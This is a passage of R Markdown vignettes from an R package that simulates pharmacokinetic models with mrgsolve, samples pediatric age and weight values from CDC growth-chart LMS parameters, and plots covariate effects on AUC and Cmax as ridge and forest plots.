)
ev1 <- ev(time = 0, amt = 100, cmt = 1)
data.dose <- ev(ev1)
data.dose <- setDT(as.data.frame(data.dose))
data.all <- data.table(idata, data.dose)
set.seed(678549)
outputsim <- pedmodsim %>%
data_set(data.all) %>%
mrgsim(end = 24, delta = 0.25)%>%
as.data.frame %>%
as.data.table
outputsim$SEX <- as.factor(outputsim$SEX)
outputsim$SEX <- factor(outputsim$SEX, labels=c("Girls","Boys"))
p1 <- ggplot(data = outputsim[outputsim$SEX=="Girls",],
aes(time, CP, group = ID)) +
geom_line(alpha = 0.2, size = 0.1) +
facet_grid(AGE ~ WT+SEX,
labeller = label_both) +
scale_y_log10() +
labs(y = expression(Log[10]~~Plasma~~Concentrations), color = "Sex", x = "Time (h)")
p1
```
## PK Parameters and Associated BSV Ranges
* Second, we compute the PK parameters AUC and Cmax, standardize them, and compute between-subject variability ranges.
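The AUC below is computed with the linear trapezoidal rule; here is a toy check of the formula used in `derive.exposure` (invented values):
```{r trapzsketch, collapse=TRUE}
# For concentrations 0, 2, 1 at 0, 1, 2 h: AUC = 0.5*(0+2) + 0.5*(2+1) = 2.5
time <- c(0, 1, 2); CP <- c(0, 2, 1)
sum(diff(time) * (CP[-1] + CP[-length(CP)])) / 2
```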
```{r ncapedpkmodel, collapse=TRUE }
derive.exposure <- function(time, CP) {
n <- length(time)
x <- c(
Cmax = max(CP),
AUC = sum(diff(time) * (CP[-1] + CP[-n])) / 2
)
data.table(paramname=names(x), paramvalue=x)
}
refbsv <- outputsim[, derive.exposure(time, CP), by=.(ID, WT, SEX, AGE)]
refbsv[, stdparamvalue := paramvalue/median(paramvalue), by=list(SEX,paramname)]
bsvranges <- refbsv[,list(
P05 = quantile(stdparamvalue, 0.05),
P25 = quantile(stdparamvalue, 0.25),
P50 = quantile(stdparamvalue, 0.5),
P75 = quantile(stdparamvalue, 0.75),
P95 = quantile(stdparamvalue, 0.95)), by = list(SEX,paramname)]
bsvranges
yvar_names <- c(
'AUC'="AUC",
'Cmax'="Cmax"
)
p4 <- ggplot(refbsv[SEX=="Girls",], aes(
x = stdparamvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_grid(paramname+AGE~WT+SEX , scales="free_y",
labeller=labeller(paramname=yvar_names,
.cols =label_both,
AGE = label_both)
,switch="y")+
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="Probability",
values=c("white", "#FF000050", "#FF0000A0",
"#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="Standardized PK Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
p4
```
```{r ped2, fig.width=7,fig.height=4, include=FALSE }
# p1<- p1 +theme_bw(base_size=18)
# p4 <- p4+ theme_bw(base_size=18)+
# theme(axis.text.y=element_blank(),axis.ticks.y = element_blank(),
# legend.position = "none")
# (p1 + p4)
#
# ggsave("Figure_7_1.png", device="png",type="cairo-png",
# dpi=125, width =9 ,height=4)
```
## Simulating Age/Weight Pairs Using NHANES LMS Values
The CDC growth charts website provides a csv file containing the smoothed LMS distribution parameters of weight at specific ages for boys and girls (based on NHANES data). The `gamlss.dist::rBCCG` function is then used to generate a realistic pediatric Age/Weight/Sex distribution from these parameters.
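A quick sketch of the BCCG (LMS) machinery on a single age (the mu/sigma/nu values here are illustrative assumptions, roughly like the 4-year-old girls row): the median of the simulated weights should be close to `mu`.
```{r bccgsketch, collapse=TRUE}
set.seed(1)
# Draw 1000 weights from a Box-Cox Cole-Green distribution
w <- gamlss.dist::rBCCG(1000, mu = 15.9, sigma = 0.13, nu = -0.6)
c(median = median(w), mu = 15.9)
```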
```{r simcovariate, collapse=TRUE }
wtage <- read.csv (url("https://www.cdc.gov/growthcharts/data/zscore/wtage.csv"))
#boys 1 and girls 2 in this file
wtage<- wtage[wtage$Agemos<=6*12,] # keeps only 2 to 6 years
wtage[wtage$Agemos>=4*12-1&wtage$Agemos<=4*12 +1,] %>%
group_by(Sex) %>%
summarize(Median=median(M))
nweightsperage <- 50 # simulate 50 kids at each age/sex combination
simwtageoutput <- data.frame(matrix(NA, nrow = nrow(wtage),ncol = nweightsperage))
names(simwtageoutput) <- paste0("Var", 1:nweightsperage)
set.seed(209321)
for (i in 1:nrow(wtage)) {
simpoints <- gamlss.dist::rBCCG(nweightsperage,
mu = wtage[i,"M"],
sigma = wtage[i,"S"],
nu = wtage[i,"L"])
simwtageoutput[i, ] <- simpoints
}
simwtageoutput$Agemos <- wtage$Agemos
simwtageoutput$AgeY <- wtage$Agemos/12
simwtageoutput$Sex <- ifelse( wtage$Sex==2,0,1)#recode girls to 0, boys to 1
simwtageoutput <- tidyr::gather(simwtageoutput,age,Weight,
paste0("Var", 1:nweightsperage))
simwtageoutput$age <- NULL
simwtageoutput$SEXLABEL <- factor(simwtageoutput$Sex,labels=c("Girls","Boys"))
wtvsageplot<- ggplot(simwtageoutput,aes(AgeY,Weight,color=SEXLABEL))+
geom_point(alpha=0.2,size=1.5)+
facet_grid(~SEXLABEL)+
labs(y="Weight (kg)", x= "Age (years)",col="")
wtvsageplot
```
## Simulation with the Multivariate Realistic Distribution
The section above generated 4900 Age/Weight/Sex values that we will use for the simulation. We remove the between-subject variability to focus on the covariate effects, as sketched below. We then show a plot of the PK profiles and of the normalized PK parameters versus Age and versus Weight.
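A minimal sketch of what removing BSV means here: `zero_re()` zeroes the OMEGA matrix, so ETA(1) and ETA(2) are 0 for every subject and the simulated profiles reflect covariate effects only.
```{r zerore, collapse=TRUE}
# All-zero OMEGA after zero_re()
omat(zero_re(pedmodsim))
```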
```{r simcovariatemodelpk,fig.height=6, collapse=TRUE }
idata <- as.data.frame(simwtageoutput)
names(idata) <- c("Agemos","AGE","SEX","WT","SEXLABEL")
ev1 <- ev(time=0,amt=100, cmt=1)
data.dose <- ev(ev1)
data.dose<-as.data.frame(data.dose)
data.all<-merge(idata,data.dose)
data.all$ID <- 1: nrow(data.all)
outcovcomb<- pedmodsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(end=24, delta=1)
outcovcomb<-as.data.frame(outcovcomb)
outcovcomb <- outcovcomb %>%
arrange(ID,time,SEX,AGE,WT)
outcovcomb$SEX <- as.factor(outcovcomb$SEX)
outcovcomb$SEX <- factor(outcovcomb$SEX,labels=c("Girls","Boys"))
f <- function(x, xcat, which, what, from, to, ...) {
what <- sub("of ", "of\n", what)
what <- sub("median ", "median\n", what)
sprintf("%s %s [%s to %s[",
which, what, signif_pad(from, 3, FALSE), signif_pad(to, 3, FALSE))
}
p3 <- ggplot(data =outcovcomb ,
aes(time, CP, group = ID,color=SEX)) +
geom_line(alpha = 0.1, size = 0.3) +
facet_grid( table1::eqcut(AGE,2,f) ~ table1::eqcut(WT,4,f) ) +
labs(y = "Plasma Concentrations", color = "Sex", x = "Time (h)")+
theme(strip.placement = "outside",legend.position =c(0.9,0.2),
legend.background = element_blank())+
guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)))
p3
```
```{r simcovariatemodelpkparam, collapse=TRUE }
out.df.multivariatecov <- as.data.frame(outcovcomb) %>%
arrange(ID,time) %>%
group_by(ID,SEX,AGE,WT)%>%
summarise (Cmax = max(CP,na.rm = TRUE),
AUC= sum(diff(time ) *na.omit(lead(CP) + CP)) / 2)
out.df.multivariatecov.long <- out.df.multivariatecov %>%
gather(paramname,paramvalue,Cmax,AUC) %>%
group_by (paramname,SEX) %>%
mutate(medparam = median(paramvalue),
paramvalue = paramvalue / medparam)
out.df.multivariatecov.long$SEXLABEL <- factor(out.df.multivariatecov.long$SEX,labels=c("Girls","Boys"))
paramvsage <- ggplot(out.df.multivariatecov.long,
aes( AGE,paramvalue,col=SEXLABEL) )+
geom_point(alpha=0.1,size=2)+
facet_grid(paramname~SEXLABEL,labeller = label_value,
scales="free_y")+
labs(y="Standardized PK Parameter Values",x="Age (years)",color="")
paramvsage
paramvswt <- ggplot(out.df.multivariatecov.long,
aes( WT,paramvalue,col=factor(SEXLABEL)) )+
geom_point(alpha=0.1,size=2)+
facet_grid(paramname~SEXLABEL,labeller = label_value,
scales="free_y")+
labs(y="Standardized PK Parameter Values",x="Weight (kg)",color="")
paramvswt
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# p3 <- p3+ theme_bw(base_size = 18)+
# theme(strip.placement = "outside",legend.position =c(0.9,0.2),
# legend.background = element_blank())+
# guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)))
#
# wtvsageplot2<- wtvsageplot +theme_bw(base_size=18) + facet_grid(SEXLABEL~.,switch="y")+theme(legend.position = "none")
# png("Figure_7_2.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(wtvsageplot2 ,p3,widths = c(1,3),ncol=2)
# dev.off()
#
# wtvsageplot<- wtvsageplot +theme_bw(base_size=18)+theme(legend.position = "none")
# wtvsageplot
# ggsave("Figure_6_1.png", device="png",type="cairo-png",
# width= 6, height = 5,dpi=72)
#
# paramvsage<- paramvsage+theme_bw(base_size=18)+theme(legend.position = "none")
# paramvswt<- paramvswt+theme_bw(base_size=18)+theme(legend.position = "none")
# (paramvswt/paramvsage)
# ggsave("Figure_6_2.png", device="png",type="cairo-png",width= 6, height = 9,dpi=72)
```
## PK Parameter Summaries and Distribution Plots
```{r computenca, fig.height=5, collapse=TRUE }
nca.summaries <- out.df.multivariatecov.long %>%
  mutate(SEXCAT = ifelse(SEX == "Boys", "Boys", "Girls"), # keep labels matched to SEX
REF = "All Subjects")
nca.summaries$WTCAT3 <- table1::eqcut( nca.summaries$WT,3,varlabel = "Weight")
nca.summaries$WTCAT4 <- table1::eqcut( nca.summaries$WT,4,varlabel = "Weight")
nca.summaries$AGECAT4 <- table1::eqcut( nca.summaries$AGE,4,varlabel = "Age")
nca.summaries.long <- gather(nca.summaries,
covname,
covvalue,REF,WTCAT3,WTCAT4,AGECAT4,SEXCAT,
factor_key = TRUE)
nca.summaries.long$covvalue <- as.factor( nca.summaries.long$covvalue)
nca.summaries.long$covvalue <- reorder(nca.summaries.long$covvalue,nca.summaries.long$paramvalue)
ggridgesplot<- ggplot(nca.summaries.long,
aes(x=paramvalue,y=covvalue,fill=factor(..quantile..),height=..ndensity..))+
facet_grid(covname~paramname,scales="free_y")+
annotate("rect",
xmin = 0.8,
xmax = 1.25,
ymin = -Inf,
ymax = Inf,
fill = "gray",
alpha = 0.4) +
stat_density_ridges(
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.01,scale=0.9,
quantiles = c(0.05,0.5, 0.95))+
scale_fill_manual(
name = "Probability", values = c("white","#0000FFA0", "#0000FFA0", "white"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")
)+
geom_vline(data=data.frame (xintercept=1), aes(xintercept =xintercept ),size = 1)+
theme_bw()+
labs(x="Effects Of Covariates on PK Parameter",y="")
ggridgesplot
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# ggridgesplot+theme(legend.position = "none")
# ggsave("Figure_7_3.png", device="png",type="cairo-png",width= 7.8, height = 6,dpi=72)
```
## A Forest Plot with a Side Table
As in previous sections, we prepare the data for `forest_plot`. We provide a two-parameter plot illustrating some of the options.
```{r simcovariate2, collapse=TRUE }
coveffectsdatacovrep <- nca.summaries.long %>%
dplyr::group_by(paramname,covname,covvalue) %>%
dplyr::summarize(
mid= median(paramvalue),
lower= quantile(paramvalue,0.05),
upper = quantile(paramvalue,0.95)) %>%
dplyr::filter(!is.na(mid)) %>%
dplyr::filter(covname !="WTCAT3")
bsvranges <- bsvranges[SEX=="Girls",]
setkey(bsvranges, paramname)
coveffectsdatacovrepbsv <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv$covname <- "BSV"
coveffectsdatacovrepbsv$covvalue <- "90% of patients"
coveffectsdatacovrepbsv$label <- "90% of patients"
coveffectsdatacovrepbsv$lower <- bsvranges$P05
coveffectsdatacovrepbsv$upper <- bsvranges$P95
coveffectsdatacovrepbsv2 <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv2$covname <- "BSV"
coveffectsdatacovrepbsv2$covvalue <- "50% of patients"
coveffectsdatacovrepbsv2$label <- "50% of patients"
coveffectsdatacovrepbsv2$lower <- bsvranges$P25
coveffectsdatacovrepbsv2$upper <- bsvranges$P75
coveffectsdatacovrepbsv<- rbind(coveffectsdatacovrep,coveffectsdatacovrepbsv2,
coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv <- coveffectsdatacovrepbsv %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
coveffectsdatacovrepbsv<- as.data.frame(coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv$label <- gsub(": ", ":\n", coveffectsdatacovrepbsv$label)
coveffectsdatacovrepbsv$covname <-factor(as.factor(coveffectsdatacovrepbsv$covname ),
levels = c("WTCAT4","AGECAT4","SEXCAT","REF", "BSV"),
labels = c("Weight","Age","Sex","REF","BSV"))
coveffectsdatacovrepbsv$label <- factor(coveffectsdatacovrepbsv$label,
levels =c(
"1st quartile of Age:\n[2.00,2.96)"
, "2nd quartile of Age:\n[2.96,3.96)"
, "3rd quartile of Age:\n[3.96,4.96)"
, "4th quartile of Age:\n[4.96,5.96]"
, "Boys", "Girls", "All Subjects","90% of patients","50% of patients"
, "1st quartile of Weight:\n[9.40,13.9)"
, "2nd quartile of Weight:\n[13.9,15.9)"
, "3rd quartile of Weight:\n[15.9,18.3)"
, "4th quartile of Weight:\n[18.3,38.2]"
))
interval_legend_text <- "Median (points)\n90% CI (horizontal lines)"
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
ref_legend_text <- "Reference (vertical line)\nClinically relevant limits\n(gray area)"
png("./Figure_7_4.png",width = 11 ,height = 7,units = "in",res=72)
coveffectsplot::forest_plot(coveffectsdatacovrepbsv,
ref_area = c(0.8, 1/0.8),
x_range = c(0.4,2.2),
strip_placement = "outside",
base_size = 18,
y_label_text_size = 10,x_label_text_size = 10,
xlabel = "Fold Change Relative to Reference",
ref_legend_text =ref_legend_text,
area_legend_text =ref_legend_text ,
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname~paramname",
facet_switch = "both",table_facet_switch = "both",
reserve_table_xaxis_label_space = TRUE,
facet_scales = "free_y", facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size=3,
plot_table_ratio = 1.5,
show_table_facet_strip = "x",
logxscale = TRUE,
major_x_ticks = c(0.5,0.8,1/0.8,1/0.5),
return_list = FALSE)
dev.off()
```
<file_sep>/cran-comments.md
## Test environments
* local Windows 10 install, R 3.6.3
* ubuntu 16.04.6 LTS (on travis-ci), R 3.6.3
* win-builder (devel and release)
## R CMD check results
0 errors | 0 warnings | 0 notes
* This release adds back two vignettes and code generation.
* Some NOTEs from previous builds on some platforms are false positives: the flagged items are used in the Shiny app code and are required for it.
## Reverse dependencies
There are no reverse dependencies listed.
---<file_sep>/vignettes/PK_Example.Rmd
---
title: "PK Model: Assessing the Impact of Covariates on Drug Exposure"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{PK_Example}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
warning =FALSE,
message =FALSE,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(mrgsolve)
library(ggplot2)
library(ggstance)
library(ggridges)
library(tidyr)
library(dplyr)
library(table1)
library(patchwork)
library(egg)
library(data.table)
theme_set(theme_bw())
#utility function to simulate varying one covariate at a time keeping the rest at the reference
expand.modelframe <- function(..., rv, covcol="covname") {
args <- list(...)
df <- lapply(args, function(x) x[[1]])
df[names(rv)] <- rv
res <- lapply(seq_along(rv), function(i) {
df[[covcol]] <- names(rv)[i]
df[[names(rv)[i]]] <- args[[names(rv)[i]]]
as.data.frame(df)
})
do.call(rbind, res)
}
nbsvsubjects <- 1000
nsim <- 100 # uncertainty replicates for vignette you might want a higher number
round_pad <- function(x, digits = 2, round5up = TRUE) {
eps <- if (round5up) x * (10^(-(digits + 3))) else 0
formatC(round(x + eps, digits), digits = digits, format = "f", flag = "0")
}
```
Here we illustrate the approach with a two-compartment PK model defined by ordinary differential equations (ODE) with covariate effects on the PK parameters clearance (CL) and central volume (V): Weight, Albumin and Sex have effects on CL, while Weight and Sex have effects on V. For simplicity, no covariates have effects on the peripheral clearance or volume. The approach is general and simulation-based, and can easily be extended to any ODE model with multiple covariate effects.
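For reference, the covariate model encoded in the `$MAIN` block below can be written out explicitly, with $\eta_{CL}$ and $\eta_{V}$ the between-subject random effects:

$$ CL_i = 4 \times \left(\frac{ALB}{45}\right)^{-0.8} \times \left(1 + 0.2\,[SEX = \mathrm{Male}]\right) \times \left(\frac{WT}{85}\right)^{1} \times e^{\eta_{CL}} $$

$$ V_i = 10 \times \left(1 + 0.07\,[SEX = \mathrm{Male}]\right) \times \left(\frac{WT}{85}\right)^{1} \times e^{\eta_{V}} $$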
## Specifying a PK Model using `mrgsolve`
```{r pkmodel, collapse=TRUE }
codepkmodelcov <- '
$PARAM @annotated
KA : 0.5 : Absorption rate constant Ka (1/h)
CL : 4 : Clearance CL (L/h)
V : 10 : Central volume Vc (L)
Vp : 50 : Peripheral volume Vp (L)
Qp : 10 : Intercompartmental clearance Q (L/h)
CLALB : -0.8 : Albumin on CL (ref. 45 g/L)
CLSEX : 0.2 : Sex on CL (ref. Female)
CLWT : 1 : Weight on CL (ref. 85 kg)
VSEX : 0.07 : Sex on Vc (ref. Female)
VWT : 1 : Weight on Vc (ref. 85 kg)
$PARAM @annotated // reference values for covariates
WT : 85 : Weight (kg)
SEX : 0 : Sex (0=Female, 1=Male)
ALB : 45 : Albumin (g/L)
$PKMODEL cmt="GUT CENT PER", depot=TRUE, trans=11
$MAIN
double CLi = CL *
pow((ALB/45.0), CLALB)*
(SEX == 1.0 ? (1.0+CLSEX) : 1.0)*
pow((WT/85.0), CLWT)*exp(nCL);
double V2i = V *
(SEX == 1.0 ? (1.0+VSEX) : 1.0)*
pow((WT/85.0), VWT)*exp(nVC);
double KAi = KA;
double V3i = Vp *pow((WT/85.0), 1);
double Qi = Qp *pow((WT/85.0), 0.75);
$OMEGA @annotated @block
nCL : 0.09 : ETA on CL
nVC : 0.01 0.09 : ETA on Vc
$TABLE
double CP = CENT/V2i;
$CAPTURE CP KAi CLi V2i V3i Qi WT SEX ALB
'
modcovsim <- mcode("codepkmodelcov", codepkmodelcov)
partab <- setDT(modcovsim@annot$data)[block=="PARAM", .(name, descr, unit)]
partab <- merge(partab, melt(setDT(modcovsim@param@data), meas=patterns("*"), var="name"))
knitr::kable(partab)
```
### Simulate Reference Subjects with BSV
We simulate subjects having the reference covariate values defined in the model, which are:
Weight = 85 kg, Sex = Female and Albumin = 45 g/L.
We also keep the between-subject variability (BSV) to illustrate its effects on the concentration-time profiles on linear and log-linear scales.
```{r pksimulation, fig.width=7, message=FALSE }
idata <- data.table(ID=1:nbsvsubjects, WT=85, SEX=0, ALB=45)
ev1 <- ev(time = 0, amt = 100, cmt = 1)
data.dose <- ev(ev1)
data.dose <- setDT(as.data.frame(data.dose))
data.all <- data.table(idata, data.dose)
outputsim <- modcovsim %>%
data_set(data.all) %>%
mrgsim(end = 24, delta = 0.25) %>%
as.data.frame %>%
as.data.table
outputsim$SEX <- factor(outputsim$SEX, labels="Female")
# Only plot a random sample of N=500
set.seed(678549)
plotdata <- outputsim[ID %in% sample(unique(ID), 500)]
p1 <- ggplot(plotdata, aes(time, CP, group = ID)) +
geom_line(alpha = 0.2, size = 0.1) +
facet_grid(ALB ~ WT + SEX, labeller = label_both) +
labs(y = "Plasma Concentrations", x = "Time (h)")
p2 <- ggplot(plotdata, aes(time, CP, group = ID)) +
geom_line(alpha = 0.2, size = 0.1) +
facet_grid(ALB ~ WT + SEX, labeller = label_both) +
scale_y_log10() +
labs(y = expression(Log[10]~Plasma~Concentrations), x = "Time (h)")
p1+p2
```
### Compute PK Parameters, Plot and Summarize BSV
In this section we compute the PK parameters of interest and plot both the raw and the standardized parameters. We also summarize and report the BSV as the ranges covering 50 and 90% of patients for each PK parameter.
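The `derive.exposure` helper below computes the AUC with the linear trapezoidal rule,

$$ AUC_{0-24} \approx \sum_{k=1}^{n-1} \frac{(t_{k+1} - t_k)\,(C_k + C_{k+1})}{2}, $$

together with $C_{max} = \max_k C_k$ and $C_{last} = C_n$.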
```{r computenca , fig.width=7 , message=FALSE }
derive.exposure <- function(time, CP) {
n <- length(time)
x <- c(
Cmax = max(CP),
Clast = CP[n],
AUC = sum(diff(time) * (CP[-1] + CP[-n])) / 2
)
data.table(paramname=names(x), paramvalue=x)
}
refbsv <- outputsim[, derive.exposure(time, CP), by=.(ID, WT, SEX, ALB)]
p3 <- ggplot(refbsv, aes(
x = paramvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_wrap(~ paramname, scales="free", ncol=1) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name = "Probability",
values = c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="PK Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
# Obtain the standardized parameter value by dividing by the median.
refbsv[, stdparamvalue := paramvalue/median(paramvalue), by=paramname]
p4 <- ggplot(refbsv, aes(
x = stdparamvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_wrap(~ paramname, scales="free_y", ncol=1) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="Probability",
values=c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="Standardized PK Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
p3+p4
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# p2<- p2 + theme_bw(base_size=18)
#
# p3<- p3+theme_bw(base_size=18) +
# theme(
# axis.title.x =element_text(size=12),
# legend.position = "none",
# strip.background = element_blank(),
# strip.text = element_blank(),
# plot.margin = margin(0,0,0,0))+
# xlab("Reference Subject\nPK Parameters with BSV")
# p4 <- p4+theme_bw(base_size=18) +
# theme(
# axis.title.x =element_text(size=12),
# axis.text.y = element_blank(),
# axis.ticks.y = element_blank(),
# legend.position = "none",
# strip.background = element_blank(),
# strip.text = element_blank(),
# panel.spacing = unit(10,"mm"),
# plot.margin = margin(0,0,0,0))+
# xlab("Reference Subject\nStandardized PK Parameters")
# (p2 + p3 +p4)
#
# ggsave("Figure_4_1.png", device="png",type="cairo-png",
# dpi=125, width =9 ,height=4)
```
**Ranges of BSV for each PK Parameter:**
```{r computebsvpk , fig.width=7 , message=FALSE }
bsvranges <- refbsv[,list(
P05 = quantile(stdparamvalue, 0.05),
P25 = quantile(stdparamvalue, 0.25),
P50 = quantile(stdparamvalue, 0.5),
P75 = quantile(stdparamvalue, 0.75),
P95 = quantile(stdparamvalue, 0.95)), by = paramname]
bsvranges
```
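As a quick sanity check, AUC is inversely proportional to CL in this model, so its standardized values should follow a log-normal distribution with variance 0.09 (the `$OMEGA` value for CL); the theoretical 5th and 95th percentiles are therefore about 0.61 and 1.64 and should be close to the simulated P05/P95 above:
```{r}
# Theoretical P05/P95 of a log-normal with variance 0.09 (sd = 0.3)
exp(qnorm(c(0.05, 0.95)) * sqrt(0.09))
```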
## Generate and Simulate at Combinations of Covariate of Interest
Based on our observed covariate data, we compute the percentiles of interest at which we will simulate. Common practice is to use the 5th, 25th, 75th and 95th percentiles (the median being the reference). In some cases, we might want to explore the minimum, maximum or other extreme scenarios. Care should be taken, as this approach might generate unrealistic combinations of covariates that would never appear in a real patient. The utility function `expand.modelframe` (written by <NAME>) is defined in the setup section of the vignette and can be found in the source code. It facilitates the creation of a set of covariate values varying one at a time.
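For example, the percentiles mentioned above could be computed from an observed covariate dataset (here a hypothetical data frame `dat` with `WT` and `ALB` columns):
```{r, eval=FALSE}
# `dat` is a hypothetical observed dataset; replace it with your own covariate data.
quantile(dat$WT,  probs = c(0.05, 0.25, 0.75, 0.95))
quantile(dat$ALB, probs = c(0.05, 0.95))
```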
**Dataframe Holding Combinations of Covariates:**
```{r covcomb , fig.width=7 }
reference.values <- data.frame(WT = 85, ALB = 45, SEX = 0)
covcomb <- expand.modelframe(
  WT = c(56, 72, 98, 128),  # P05, P25, P75, P95 (P50 = 85 kg is the reference)
  ALB = c(40, 50),          # P05, P95 (P50 = 45 g/L is the reference)
  SEX = c(1),               # Reference is SEX = 0 (female)
rv = reference.values)
# Add the reference
covcomb <- rbind(covcomb, data.table(reference.values, covname="REF"))
covcomb$ID <- 1:nrow(covcomb)
covcomb
```
### Simulation at Unique Combinations of Covariates
As a first step, we simulate without uncertainty and without BSV, using `zero_re()` to zero out the random effects, at each unique combination of covariates, and provide a plot to visualize the effects.
```{r, fig.width=7 ,message=FALSE}
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1)
data.dose <- as.data.frame(ev1)
data.all <- data.table(idata, data.dose)
outcovcomb<- modcovsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(end=24, delta=0.25) %>%
as.data.frame %>%
as.data.table
outcovcomb$SEX <- factor(outcovcomb$SEX, labels=c("Female", "Male"))
ggplot(outcovcomb, aes(x=time, y=CP, col=factor(WT), linetype=SEX)) +
geom_line(aes(group=ID), alpha=1, size=1.5) +
facet_grid(ALB ~ WT, labeller=label_both) +
labs(
x = "Time (h)",
y = "Plasma Concentrations",
linetype = "Sex",
colour = "Weight",
caption = "Simulation without Uncertainty\nwithout BSV") +
coord_cartesian(ylim=c(0,3.5))
```
### Adding Uncertainty from a Varcov Matrix
* First, we will invent a varcov matrix by assuming 15% relative standard errors and correlations of 0.2 across the board. We then simulate 100 sets of parameters from a multivariate normal (kept at 100 for the vignette; use more replicates for a real project). Also, unless the model was written in a way that allows unconstrained parameter values, care should be taken to make sure the simulated parameters are valid and make sense. When available, use the sets of parameters from a bootstrap run.
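The conversion performed by the small `cor2cov` helper below is simply

$$ \Sigma = D\,R\,D, \qquad D = \operatorname{diag}(0.15\,\theta), $$

where $R$ is the assumed correlation matrix (0.2 off-diagonal) and $0.15\,\theta$ are the standard errors implied by the 15% RSE.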
**Variance Covariance Matrix of fixed effects:**
```{r, fig.width=7}
theta <- unclass(as.list(param(modcovsim)))
theta[c("WT", "SEX", "ALB")] <- NULL
theta <- unlist(theta)
as.data.frame(t(theta))
cor2cov <- function (cor, sd)
{
if (missing(sd)) {
sd <- diag(cor)
}
diag(cor) <- 1
n <- nrow(cor)
diag(sd, n) %*% cor %*% diag(sd, n)
}
varcov <- cor2cov(
matrix(0.2, nrow=length(theta), ncol=length(theta)),
sd=theta*0.15)
rownames(varcov) <- colnames(varcov) <- names(theta)
as.data.frame(varcov)
```
### Generating Sets of Parameters with Uncertainty
* Second, we generate the sim_parameters dataset using `mvrnorm` and then incorporate the uncertainty by simulating using a different set of parameters (row) for each replicate.
**First Few Rows of a Dataset Containing Simulated Fixed Effects with Uncertainty:**
```{r, fig.width=7}
set.seed(678549)
# mvtnorm::rmvnorm is another option that can be explored
sim_parameters <- MASS::mvrnorm(nsim, theta, varcov, empirical = TRUE) %>% as.data.table
head(sim_parameters)
```
### Iterative Simulation to Apply the Uncertainty
* Third, we illustrate how you can iterate over a set of parameter values using a `for` loop. We then overlay the previous simulation results without uncertainty on the ones with uncertainty, to visualize the effect of adding it.
```{r, fig.width=7,fig.height=4}
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1)
data.dose <- as.data.frame(ev1)
iter_sims <- NULL
for(i in 1:nsim) {
data.all <- data.table(idata, data.dose, sim_parameters[i])
out <- modcovsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(start=0, end=24, delta=0.25) %>%
as.data.frame %>%
as.data.table
out[, rep := i]
iter_sims <- rbind(iter_sims, out)
}
iter_sims$SEX <- factor(iter_sims$SEX, labels = c("Female", "Male"))
pkprofileuncertainty<- ggplot(iter_sims, aes(x=time, y=CP, col=factor(WT), linetype=SEX)) +
geom_line(aes(group=interaction(ID, rep)), alpha=0.1, size=0.1) +
